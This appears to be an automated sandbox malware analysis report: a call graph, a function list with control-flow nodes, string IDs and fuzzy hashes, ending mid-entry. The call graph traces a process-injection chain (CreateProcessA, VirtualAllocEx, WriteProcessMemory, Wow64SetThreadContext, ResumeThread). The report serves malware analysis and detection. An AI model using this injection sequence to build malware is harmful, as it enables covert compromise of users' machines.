48864 5e17de0 2 API calls 48863->48864 48865 5e17dd0 2 API calls 48863->48865 48864->48863 48865->48863 48867 5e10f42 48866->48867 48868 5e17de0 2 API calls 48867->48868 48869 5e17dd0 2 API calls 48867->48869 48868->48867 48869->48867 48871 5e10f42 48870->48871 48872 5e17de0 2 API calls 48871->48872 48873 5e17dd0 2 API calls 48871->48873 48872->48871 48873->48871 48875 5e11537 48874->48875 48876 5e10f42 48874->48876 48877 5e1158f 48875->48877 49096 5e17ff7 48875->49096 49105 5e17fb0 48875->49105 49114 5e17fc0 48875->49114 48881 5e17de0 2 API calls 48876->48881 48882 5e17dd0 2 API calls 48876->48882 48881->48876 48882->48876 48884 5e10f42 48883->48884 48885 5e17de0 2 API calls 48884->48885 48886 5e17dd0 2 API calls 48884->48886 48885->48884 48886->48884 48888 5e10f42 48887->48888 48889 5e17de0 2 API calls 48888->48889 48890 5e17dd0 2 API calls 48888->48890 48889->48888 48890->48888 48892 5e10f42 48891->48892 48893 5e17de0 2 API calls 48892->48893 48894 5e17dd0 2 API calls 48892->48894 48893->48892 48894->48892 48896 5e10f42 48895->48896 48897 5e17de0 2 API calls 48896->48897 48898 5e17dd0 2 API calls 48896->48898 48897->48896 48898->48896 48900 5e10f42 48899->48900 48901 5e17de0 2 API calls 48900->48901 48902 5e17dd0 2 API calls 48900->48902 48901->48900 48902->48900 48904 5e10f42 48903->48904 48905 5e17de0 2 API calls 48904->48905 48906 5e17dd0 2 API calls 48904->48906 48905->48904 48906->48904 48908 5e10f42 48907->48908 48909 5e17de0 2 API calls 48908->48909 48910 5e17dd0 2 API calls 48908->48910 48909->48908 48910->48908 48912 5e118e0 48911->48912 48914 5e17e80 2 API calls 48912->48914 48915 5e17e28 2 API calls 48912->48915 48916 5e17e38 2 API calls 48912->48916 48913 5e1190b 48914->48913 48915->48913 48916->48913 48918 5e1151b 48917->48918 48919 5e1158f 48918->48919 48920 5e17fc0 2 API calls 48918->48920 48921 5e17fb0 4 API calls 48918->48921 48922 5e17ff7 4 API calls 48918->48922 48920->48918 48921->48918 48922->48918 48924 5e10f42 48923->48924 48925 5e17de0 2 API calls 48924->48925 48926 5e17dd0 2 API calls 48924->48926 48925->48924 48926->48924 48928 5e1119b 48927->48928 48930 5e17fb0 4 API calls 48928->48930 49143 5e17f63 48928->49143 49149 5e17f70 48928->49149 48929 5e111be 48930->48929 48934 5e1184d 48933->48934 48936 5e17e80 2 API calls 48934->48936 48937 5e17e28 2 API calls 48934->48937 48938 5e17e38 2 API calls 48934->48938 48935 5e11888 48935->48764 48936->48935 48937->48935 48938->48935 48940 5e10f42 48939->48940 48941 5e17de0 2 API calls 48940->48941 48942 5e17dd0 2 API calls 48940->48942 48941->48940 48942->48940 48944 5e10f42 48943->48944 48945 5e17de0 2 API calls 48944->48945 48946 5e17dd0 2 API calls 48944->48946 48945->48944 48946->48944 48948 5e10f42 48947->48948 48949 5e17de0 2 API calls 48948->48949 48950 5e17dd0 2 API calls 48948->48950 48949->48948 48950->48948 48952 5e11316 48951->48952 48953 5e10f42 48951->48953 48952->48951 48954 5e17ff7 4 API calls 48952->48954 49154 5e18008 48952->49154 48956 5e17de0 2 API calls 48953->48956 48957 5e17dd0 2 API calls 48953->48957 48954->48952 48956->48953 48957->48953 48959 5e10f42 48958->48959 48960 5e17de0 2 API calls 48959->48960 48961 5e17dd0 2 API calls 48959->48961 48960->48959 48961->48959 48963 5e1158f 48962->48963 48964 5e11537 48962->48964 48964->48962 48965 5e17fc0 2 API calls 48964->48965 48966 5e17fb0 4 API calls 48964->48966 48967 5e17ff7 4 API calls 48964->48967 48965->48964 48966->48964 48967->48964 48969 5e11491 48968->48969 48970 5e1184e 48968->48970 48969->48970 48972 5e10f42 48969->48972 48975 5e17e80 2 API calls 48970->48975 48976 5e17e28 2 API calls 48970->48976 48977 5e17e38 2 API calls 48970->48977 48971 5e11888 48971->48764 48973 5e17de0 2 API calls 48972->48973 48974 5e17dd0 2 API calls 48972->48974 48973->48972 48974->48972 48975->48971 48976->48971 48977->48971 48979 5e10f42 48978->48979 48980 5e17de0 2 API calls 48979->48980 48981 5e17dd0 2 API calls 48979->48981 48980->48979 48981->48979 48983 5e10f42 48982->48983 48984 5e17de0 2 API calls 48983->48984 48985 5e17dd0 2 API calls 48983->48985 48984->48983 48985->48983 48987 5e10f42 48986->48987 48988 5e17de0 2 API calls 48987->48988 48989 5e17dd0 2 API calls 48987->48989 48988->48987 48989->48987 48991 5e11bd9 48990->48991 49159 5e124a9 48991->49159 49164 5e124b8 48991->49164 48992 5e11bf1 48996 5e10f42 48995->48996 48997 5e17de0 2 API calls 48996->48997 48998 5e17dd0 2 API calls 48996->48998 48997->48996 48998->48996 49000 5e1172b 48999->49000 49001 5e10f42 48999->49001 49187 5e17d90 49000->49187 49192 5e17d83 49000->49192 49004 5e17de0 2 API calls 49001->49004 49005 5e17dd0 2 API calls 49001->49005 49004->49001 49005->49001 49007 5e10f42 49006->49007 49008 5e17de0 2 API calls 49007->49008 49009 5e17dd0 2 API calls 49007->49009 49008->49007 49009->49007 49011 5e10f42 49010->49011 49012 5e17de0 2 API calls 49011->49012 49013 5e17dd0 2 API calls 49011->49013 49012->49011 49013->49011 49015 5e10f42 49014->49015 49016 5e17de0 2 API calls 49015->49016 49017 5e17dd0 2 API calls 49015->49017 49016->49015 49017->49015 49019 5e10f42 49018->49019 49020 5e17de0 2 API calls 49019->49020 49021 5e17dd0 2 API calls 49019->49021 49020->49019 49021->49019 49023 5e112fa 49022->49023 49024 5e10f42 49023->49024 49025 5e17ff7 4 API calls 49023->49025 49026 5e18008 2 API calls 49023->49026 49027 5e17de0 2 API calls 49024->49027 49028 5e17dd0 2 API calls 49024->49028 49025->49023 49026->49023 49027->49024 49028->49024 49030 5e11dbf 49029->49030 49032 5e16530 WriteProcessMemory 49030->49032 49033 5e16538 WriteProcessMemory 49030->49033 49031 5e11df6 49032->49031 49033->49031 49035 5e10f42 49034->49035 49036 5e17de0 2 API calls 49035->49036 49037 5e17dd0 2 API calls 49035->49037 49036->49035 49037->49035 49039 5e10f42 49038->49039 49039->49038 49040 5e17de0 2 API calls 49039->49040 49041 5e17dd0 2 API calls 49039->49041 49040->49039 49041->49039 49043 5e10f42 49042->49043 49044 5e17de0 2 API calls 49043->49044 49045 5e17dd0 2 API calls 49043->49045 49044->49043 49045->49043 49047 5e10ef6 49046->49047 49048 5e17de0 2 API calls 49047->49048 49049 5e17dd0 2 API calls 49047->49049 49048->49047 49049->49047 49051 5e10f42 49050->49051 49052 5e17de0 2 API calls 49051->49052 49053 5e17dd0 2 API calls 49051->49053 49052->49051 49053->49051 49055 5e17e5c 49054->49055 49056 5e17e83 49054->49056 49070 5e16530 49055->49070 49074 5e16538 49055->49074 49056->48854 49057 5e17e6f 49057->48854 49061 5e17e4d 49060->49061 49063 5e16530 WriteProcessMemory 49061->49063 49064 5e16538 WriteProcessMemory 49061->49064 49062 5e17e6f 49062->48854 49063->49062 49064->49062 49066 5e17e38 49065->49066 49068 5e16530 WriteProcessMemory 49066->49068 49069 5e16538 WriteProcessMemory 49066->49069 49067 5e17e6f 49067->48854 49068->49067 49069->49067 49071 5e16538 WriteProcessMemory 49070->49071 49073 5e1661a 49071->49073 49073->49057 49075 5e16581 WriteProcessMemory 49074->49075 49077 5e1661a 49075->49077 49077->49057 49079 5e17df5 49078->49079 49088 5e15e73 49079->49088 49092 5e15e78 49079->49092 49080 5e17e17 49080->48859 49084 5e17de0 49083->49084 49086 5e15e73 VirtualAllocEx 49084->49086 49087 5e15e78 VirtualAllocEx 49084->49087 49085 5e17e17 49085->48859 49086->49085 49087->49085 49089 5e15e78 VirtualAllocEx 49088->49089 49091 5e15f34 49089->49091 49091->49080 49093 5e15ebc VirtualAllocEx 49092->49093 49095 5e15f34 49093->49095 49095->49080 49097 5e17fd4 49096->49097 49098 5e17ffb 49096->49098 49119 5e168d0 49097->49119 49123 5e168c8 49097->49123 49127 5e15040 49098->49127 49131 5e15038 49098->49131 49099 5e17feb 49099->48875 49100 5e18033 49100->48875 49106 5e17f94 49105->49106 49107 5e17fbb 49105->49107 49135 5e157f3 49106->49135 49139 5e157f8 49106->49139 49112 5e168d0 ResumeThread 49107->49112 49113 5e168c8 ResumeThread 49107->49113 49108 5e17f9e 49108->48875 49109 5e17feb 49109->48875 49112->49109 49113->49109 49115 5e17fd5 49114->49115 49117 5e168d0 ResumeThread 49115->49117 49118 5e168c8 ResumeThread 49115->49118 49116 5e17feb 49116->48875 49117->49116 49118->49116 49120 5e16914 ResumeThread 49119->49120 49122 5e16960 49120->49122 49122->49099 49124 5e168d0 ResumeThread 49123->49124 49126 5e16960 49124->49126 49126->49099 49128 5e15084 FindCloseChangeNotification 49127->49128 49130 5e150d0 49128->49130 49130->49100 49132 5e15040 FindCloseChangeNotification 49131->49132 49134 5e150d0 49132->49134 49134->49100 49136 5e157f8 Wow64SetThreadContext 49135->49136 49138 5e158b9 49136->49138 49138->49108 49140 5e15841 Wow64SetThreadContext 49139->49140 49142 5e158b9 49140->49142 49142->49108 49144 5e17f44 49143->49144 49145 5e17f6b 49143->49145 49144->48929 49146 5e17f9e 49145->49146 49147 5e157f3 Wow64SetThreadContext 49145->49147 49148 5e157f8 Wow64SetThreadContext 49145->49148 49146->48929 49147->49146 49148->49146 49150 5e17f85 49149->49150 49151 5e17f9e 49150->49151 49152 5e157f3 Wow64SetThreadContext 49150->49152 49153 5e157f8 Wow64SetThreadContext 49150->49153 49151->48929 49152->49151 49153->49151 49155 5e1801d 49154->49155 49157 5e15040 FindCloseChangeNotification 49155->49157 49158 5e15038 FindCloseChangeNotification 49155->49158 49156 5e18033 49156->48952 49157->49156 49158->49156 49160 5e124b8 49159->49160 49161 5e124f1 49160->49161 49169 5e12864 49160->49169 49174 5e12806 49160->49174 49161->48992 49165 5e124cf 49164->49165 49166 5e124f1 49165->49166 49167 5e12864 2 API calls 49165->49167 49168 5e12806 2 API calls 49165->49168 49166->48992 49167->49166 49168->49166 49170 5e1288c 49169->49170 49179 5e15448 49170->49179 49183 5e1543c 49170->49183 49175 5e1280c 49174->49175 49177 5e15448 CreateProcessA 49175->49177 49178 5e1543c CreateProcessA 49175->49178 49176 5e12da8 49177->49176 49178->49176 49180 5e154c8 CreateProcessA 49179->49180 49182 5e156c4 49180->49182 49185 5e154c8 CreateProcessA 49183->49185 49186 5e156c4 49185->49186 49188 5e17da5 49187->49188 49190 5e157f3 Wow64SetThreadContext 49188->49190 49191 5e157f8 Wow64SetThreadContext 49188->49191 49189 5e17dbe 49189->49001 49190->49189 49191->49189 49193 5e17d64 49192->49193 49194 5e17d8b 49192->49194 49193->49001 49196 5e157f3 Wow64SetThreadContext 49194->49196 49197 5e157f8 Wow64SetThreadContext 49194->49197 49195 5e17dbe 49195->49001 49196->49195 49197->49195 48743 5d2ed38 48744 5d2ed7c VirtualAlloc 48743->48744 48746 5d2ede9 48744->48746 48715 2f68338 48716 2f68352 48715->48716 48717 2f68362 48716->48717 48719 5d22857 48716->48719 48722 5d2d670 48719->48722 48724 5d2d697 48722->48724 48726 5d2db70 48724->48726 48727 5d2dbb9 VirtualProtect 48726->48727 48729 5d22875 48727->48729 48730 142d01c 48731 142d034 48730->48731 48732 142d08f 48731->48732 48734 5d2e258 48731->48734 48735 5d2e2b1 48734->48735 48738 5d2e7e8 48735->48738 48736 5d2e2e6 48739 5d2e815 48738->48739 48740 5d2d670 VirtualProtect 48739->48740 48742 5d2e9ab 48739->48742 48741 5d2e99c 48740->48741 48741->48736 48742->48736

                                                Executed Functions

                                                Function 05B09768 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1145 5b09768-5b097a5 call 5b09c88 1147 5b097c7-5b097dd call 5b09570 1145->1147 1148 5b097a7-5b097aa 1145->1148 1154 5b09b53-5b09b67 1147->1154 1155 5b097e3-5b097ef 1147->1155 1260 5b097ac call 5b0a080 1148->1260 1261 5b097ac call 5b0a0d8 1148->1261 1151 5b097b2-5b097b4 1151->1147 1152 5b097b6-5b097be 1151->1152 1152->1147 1165 5b09ba7-5b09bb0 1154->1165 1156 5b09920-5b09927 1155->1156 1157 5b097f5-5b097f8 1155->1157 1160 5b09a56-5b09a93 call 5b08f78 call 5b0bf10 1156->1160 1161 5b0992d-5b09936 1156->1161 1158 5b097fb-5b09804 1157->1158 1163 5b09c48 1158->1163 1164 5b0980a-5b0981e 1158->1164 1205 5b09a99-5b09b4a call 5b08f78 1160->1205 1161->1160 1166 5b0993c-5b09a48 call 5b08f78 call 5b09508 call 5b08f78 1161->1166 1173 5b09c4d-5b09c51 1163->1173 1182 5b09910-5b0991a 1164->1182 1183 5b09824-5b098b9 call 5b09570 * 2 call 5b08f78 call 5b09508 call 5b095b0 call 5b09658 call 5b096c0 1164->1183 1167 5b09bb2-5b09bb9 1165->1167 1168 5b09b75-5b09b7e 1165->1168 1256 5b09a53 1166->1256 1257 5b09a4a 1166->1257 1171 5b09c07-5b09c0e 1167->1171 1172 5b09bbb-5b09bfe call 5b08f78 1167->1172 1168->1163 1175 5b09b84-5b09b96 1168->1175 1176 5b09c10-5b09c20 1171->1176 1177 5b09c33-5b09c46 1171->1177 1172->1171 1180 5b09c53 1173->1180 1181 5b09c5c 1173->1181 1192 5b09ba6 1175->1192 1193 5b09b98-5b09b9d 1175->1193 1176->1177 1194 5b09c22-5b09c2a 1176->1194 1177->1173 1180->1181 1190 5b09c5d 1181->1190 1182->1156 1182->1158 1235 5b098d8-5b0990b call 5b096c0 1183->1235 1236 5b098bb-5b098d3 call 5b09658 call 5b08f78 call 5b09228 1183->1236 1190->1190 1192->1165 1262 5b09ba0 call 5b0c6b0 1193->1262 1263 5b09ba0 call 5b0c6a0 1193->1263 1194->1177 1205->1154 1235->1182 1236->1235 1256->1160 1257->1256 1260->1151 1261->1151 1262->1192 1263->1192
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q$4']q$4']q
                                                • API String ID: 0-705557208
                                                • Opcode ID: 6546622b453f3ebfef8473f88c37637b392d96cb94828ae83ba7a3829de4da32
                                                • Instruction ID: 079831b55e5906bf3e5e9b6afa37ffe765e146d2c502606a7edf5654b57ea2d8
                                                • Opcode Fuzzy Hash: 6546622b453f3ebfef8473f88c37637b392d96cb94828ae83ba7a3829de4da32
                                                • Instruction Fuzzy Hash: B3F19734B10218DFCB18DB64D998AADBBB2FF89300F558594E406AB3A5DB71FD42CB50
                                                Function 05B0DD2F Relevance: 4.1, Strings: 3, Instructions: 364COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1264 5b0dd2f-5b0dd50 1265 5b0dd56-5b0dd5a 1264->1265 1266 5b0de69-5b0de8e 1264->1266 1267 5b0dd60-5b0dd69 1265->1267 1268 5b0de95-5b0deba 1265->1268 1266->1268 1270 5b0dec1-5b0ded2 1267->1270 1271 5b0dd6f-5b0dd96 1267->1271 1268->1270 1277 5b0dedb-5b0def7 1270->1277 1280 5b0dd9c-5b0dd9e 1271->1280 1281 5b0de5e-5b0de68 1271->1281 1287 5b0defe-5b0df09 1277->1287 1284 5b0dda0-5b0dda3 1280->1284 1285 5b0ddbf-5b0ddc1 1280->1285 1286 5b0dda9-5b0ddb3 1284->1286 1284->1287 1288 5b0ddc4-5b0ddc8 1285->1288 1286->1287 1290 5b0ddb9-5b0ddbd 1286->1290 1287->1277 1296 5b0df0b-5b0df54 1287->1296 1291 5b0de29-5b0de35 1288->1291 1292 5b0ddca-5b0ddd9 1288->1292 1290->1285 1290->1288 1291->1287 1293 5b0de3b-5b0de58 call 5b016b0 1291->1293 1292->1287 1299 5b0dddf-5b0de26 call 5b016b0 1292->1299 1293->1280 1293->1281 1304 5b0df56-5b0df6a call 5b0e210 1296->1304 1305 5b0df78-5b0df8f 1296->1305 1299->1291 1383 5b0df6d call 5b0e5e0 1304->1383 1384 5b0df6d call 5b0e5b8 1304->1384 1385 5b0df6d call 5b0e458 1304->1385 1315 5b0e080-5b0e090 1305->1315 1316 5b0df95-5b0e07b call 5b09570 call 5b08f78 * 2 call 5b095b0 call 5b0cd78 call 5b08f78 call 5b0bf10 call 5b09e18 1305->1316 1311 5b0df73 1314 5b0e1a3-5b0e1ae 1311->1314 1322 5b0e1b0-5b0e1c0 1314->1322 1323 5b0e1dd-5b0e1fe call 5b096c0 1314->1323 1325 5b0e096-5b0e170 call 5b09570 * 2 call 5b09d28 call 5b08f78 * 2 call 5b09228 call 5b096c0 call 5b08f78 1315->1325 1326 5b0e17e-5b0e19a call 5b08f78 1315->1326 1316->1315 1338 5b0e1d0-5b0e1d8 call 5b09e18 1322->1338 1339 5b0e1c2-5b0e1c8 1322->1339 1379 5b0e172 1325->1379 1380 5b0e17b 1325->1380 1326->1314 1338->1323 1339->1338 1379->1380 1380->1326 1383->1311 1384->1311 1385->1311
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq$(aq$Haq
                                                • API String ID: 0-2456560092
                                                • Opcode ID: 3cce25c4c3c87ee9fffe780dc383e2f463ef2ea9c8106ecec52302d23b96112f
                                                • Instruction ID: 1829f2a015b894ab8ea9580d6622888054423f070263ba60394769b056322a9c
                                                • Opcode Fuzzy Hash: 3cce25c4c3c87ee9fffe780dc383e2f463ef2ea9c8106ecec52302d23b96112f
                                                • Instruction Fuzzy Hash: 73E10134A002099FCB04DF64D4949ADBFB2FF89310F5485A9E806AB3A5DB34FD46CB51
                                                Function 05B07158 Relevance: 2.8, Strings: 2, Instructions: 342COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1822 5b07158-5b0716a 1823 5b07194-5b07198 1822->1823 1824 5b0716c-5b0718d 1822->1824 1825 5b071a4-5b071b3 1823->1825 1826 5b0719a-5b0719c 1823->1826 1824->1823 1827 5b071b5 1825->1827 1828 5b071bf-5b071eb 1825->1828 1826->1825 1827->1828 1832 5b071f1-5b071f7 1828->1832 1833 5b07418-5b0745f 1828->1833 1835 5b072c9-5b072cd 1832->1835 1836 5b071fd-5b07203 1832->1836 1868 5b07461 1833->1868 1869 5b07475-5b07481 1833->1869 1837 5b072f0-5b072f9 1835->1837 1838 5b072cf-5b072d8 1835->1838 1836->1833 1840 5b07209-5b07216 1836->1840 1842 5b072fb-5b0731b 1837->1842 1843 5b0731e-5b07321 1837->1843 1838->1833 1841 5b072de-5b072ee 1838->1841 1844 5b072a8-5b072b1 1840->1844 1845 5b0721c-5b07225 1840->1845 1847 5b07324-5b0732a 1841->1847 1842->1843 1843->1847 1844->1833 1849 5b072b7-5b072c3 1844->1849 1845->1833 1846 5b0722b-5b07243 1845->1846 1850 5b07245 1846->1850 1851 5b0724f-5b07261 1846->1851 1847->1833 1853 5b07330-5b07343 1847->1853 1849->1835 1849->1836 1850->1851 1851->1844 1859 5b07263-5b07269 1851->1859 1853->1833 1855 5b07349-5b07359 1853->1855 1855->1833 1858 5b0735f-5b0736c 1855->1858 1858->1833 1861 5b07372-5b07387 1858->1861 1862 5b07275-5b0727b 1859->1862 1863 5b0726b 1859->1863 1861->1833 1867 5b0738d-5b073b0 1861->1867 1862->1833 1864 5b07281-5b072a5 1862->1864 1863->1862 1867->1833 1877 5b073b2-5b073bd 1867->1877 1873 5b07464-5b07466 1868->1873 1870 5b07483 1869->1870 1871 5b0748d-5b074a9 1869->1871 1870->1871 1874 5b07468-5b07473 1873->1874 1875 5b074aa-5b074d7 call 5b02880 1873->1875 1874->1869 1874->1873 1887 5b074d9-5b074df 1875->1887 1888 5b074ef-5b074f1 1875->1888 1879 5b0740e-5b07415 1877->1879 1880 5b073bf-5b073c9 1877->1880 1880->1879 1886 5b073cb-5b073e1 1880->1886 1895 5b073e3 1886->1895 1896 5b073ed-5b07406 1886->1896 1889 5b074e1 1887->1889 1890 5b074e3-5b074e5 1887->1890 1909 5b074f3 call 5b07570 1888->1909 1910 5b074f3 call 5b07560 1888->1910 1911 5b074f3 call 5b08731 1888->1911 1889->1888 1890->1888 1891 5b074f9-5b074fd 1893 5b07548-5b07558 1891->1893 1894 5b074ff-5b07516 1891->1894 1894->1893 1902 5b07518-5b07522 1894->1902 1895->1896 1896->1879 1904 5b07524-5b07533 1902->1904 1905 5b07535-5b07545 1902->1905 1904->1905 1909->1891 1910->1891 1911->1891
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq$d
                                                • API String ID: 0-3557608343
                                                • Opcode ID: 3c5864d7cccf91052ba1c98cdbb426e63f8d98ccb5333780e809f24b8a7b35cd
                                                • Instruction ID: bbbc53b336c006b3891f41dbf244199914c82b4fe32bfb9e133f0edb930f9893
                                                • Opcode Fuzzy Hash: 3c5864d7cccf91052ba1c98cdbb426e63f8d98ccb5333780e809f24b8a7b35cd
                                                • Instruction Fuzzy Hash: B3D15C306006068FCB14DF29C48496EFBF6FF89320B55D9A9D45A9B3A5DB34F846CB90
                                                Function 05B035C8 Relevance: 2.7, Strings: 2, Instructions: 154COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2087 5b035c8-5b035da 2088 5b035e0-5b035e2 2087->2088 2089 5b036ce-5b036f3 2087->2089 2090 5b035e8-5b035f4 2088->2090 2091 5b036fa-5b0371e 2088->2091 2089->2091 2095 5b035f6-5b03602 2090->2095 2096 5b03608-5b03618 2090->2096 2103 5b03725-5b03749 2091->2103 2095->2096 2095->2103 2096->2103 2104 5b0361e-5b0362c 2096->2104 2107 5b03750-5b037c3 2103->2107 2104->2107 2108 5b03632-5b03639 call 5b037c8 2104->2108 2110 5b0363f-5b03688 2108->2110 2125 5b0368a-5b036a3 2110->2125 2126 5b036ab-5b036cb call 5b01680 2110->2126 2125->2126
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq$Haq
                                                • API String ID: 0-3785302501
                                                • Opcode ID: d5aede8f78794eef48e71cb8686e33e4a37746004d2d47a0e145b679b05f3a92
                                                • Instruction ID: baa760ea8dbe673ab58e0a2cc9fcc681f72cf55a979ec480edd73bbf8afa8fb0
                                                • Opcode Fuzzy Hash: d5aede8f78794eef48e71cb8686e33e4a37746004d2d47a0e145b679b05f3a92
                                                • Instruction Fuzzy Hash: 3D517B347006058FC759AF29C49892EBFB3FF9921075044ADD8069B3A5DF35ED06CBA1
                                                Function 05FB557A Relevance: 2.5, Strings: 2, Instructions: 23COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2217 5fb557a-5fb55a1 call 5fcece8 2220 5fb55a7-5fb55cf 2217->2220 2222 5fb010d-5fb0118 2220->2222 2223 5fb55d5-5fb55e0 2220->2223 2224 5fb011a-5fb05bb 2222->2224 2225 5fb0121-5fc3d86 2222->2225 2223->2222 2229 5fb05c1-5fb05e9 2224->2229 2230 5fbba90-5fbbad2 2224->2230 2229->2222 2233 5fb05ef-5fb05fa 2229->2233 2236 5fbbae4-5fbbb1b 2230->2236 2237 5fbbad4-5fbbada 2230->2237 2233->2222 2236->2222 2239 5fbbb21-5fbbb2c 2236->2239 2237->2236 2239->2222
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,$=
                                                • API String ID: 0-1737935649
                                                • Opcode ID: ca6f12064d07923478139dc95189c7dc8c599de7ec434056d8b7890d4c6ffe60
                                                • Instruction ID: bff525cb3f0ae5fbcbf8e049942ee1b186beab7484542855f4551df2acc699db
                                                • Opcode Fuzzy Hash: ca6f12064d07923478139dc95189c7dc8c599de7ec434056d8b7890d4c6ffe60
                                                • Instruction Fuzzy Hash: BEF0493494411ACFEB60DB54D8487EA7AB5EF04354F1140E6900993651DB784A888F12
                                                Function 05B0A640 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,aq
                                                • API String ID: 0-3092978723
                                                • Opcode ID: fc9d112d37b1b043774719162aa37e8822f5e9830bd51aca19bce6a92c56da2a
                                                • Instruction ID: ffee5492e3a58a131037351e1993cf902e21fabfbc74835e59d04a9bfed2e5cb
                                                • Opcode Fuzzy Hash: fc9d112d37b1b043774719162aa37e8822f5e9830bd51aca19bce6a92c56da2a
                                                • Instruction Fuzzy Hash: 52521A75A002288FCB64DF69C981BDDBBF6BF88300F1545D9E509A73A5DA30AD81CF61
                                                Function 05B0B4A7 Relevance: 1.7, Strings: 1, Instructions: 417COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q
                                                • API String ID: 0-1007455737
                                                • Opcode ID: 8bb3a9df5a61cb73e8184f182f0d317132219897ca6b47e0119effd422e490f9
                                                • Instruction ID: 1bed0e61a2bcb6d7e1c9457b5a741ee5694336ec6b485ffdaa8dde2f56e1689e
                                                • Opcode Fuzzy Hash: 8bb3a9df5a61cb73e8184f182f0d317132219897ca6b47e0119effd422e490f9
                                                • Instruction Fuzzy Hash: 07E1BB717042028FDB649F29C49566E7FF2FFD5210F6440EAE882CB3E5DA34E9818B56
                                                Function 05D2DB70 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05D2DC14
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246264025.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5d20000_itdtn.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 465d9ab7012fba8683cec0f7d8c70954887ab73b300aad4dce4f81570f956fe0
                                                • Instruction ID: 2cf6d35b746832321584c34eb2c0fd92a3fd25f022b8e66ca7bbc79ed4437169
                                                • Opcode Fuzzy Hash: 465d9ab7012fba8683cec0f7d8c70954887ab73b300aad4dce4f81570f956fe0
                                                • Instruction Fuzzy Hash: F131A8B8D002589FCB10DFA9D980A9EFBB1BF59310F14942AE819B7210D775A945CF94
                                                Function 05B09759 Relevance: 1.5, Strings: 1, Instructions: 225COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q
                                                • API String ID: 0-1259897404
                                                • Opcode ID: d0f0973b687fe82f8b193e20dc0ea55967b8451fe2d6b574b4fbc4276ffd93ec
                                                • Instruction ID: c6d018829c2e8e843c1299cc90a3f0fa83e31381f4cc8335b34e1d81cd3cd938
                                                • Opcode Fuzzy Hash: d0f0973b687fe82f8b193e20dc0ea55967b8451fe2d6b574b4fbc4276ffd93ec
                                                • Instruction Fuzzy Hash: 04A1B834B10218DFCB04DFA4D9989ADBBB2FF89300F559599E406AB3A5DB30BD42CB50
                                                Function 05B0E458 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq
                                                • API String ID: 0-600464949
                                                • Opcode ID: 4f9634ed714989510cc04ece1020d712b4b2272d6dd80578f6609b4bb2bd95f9
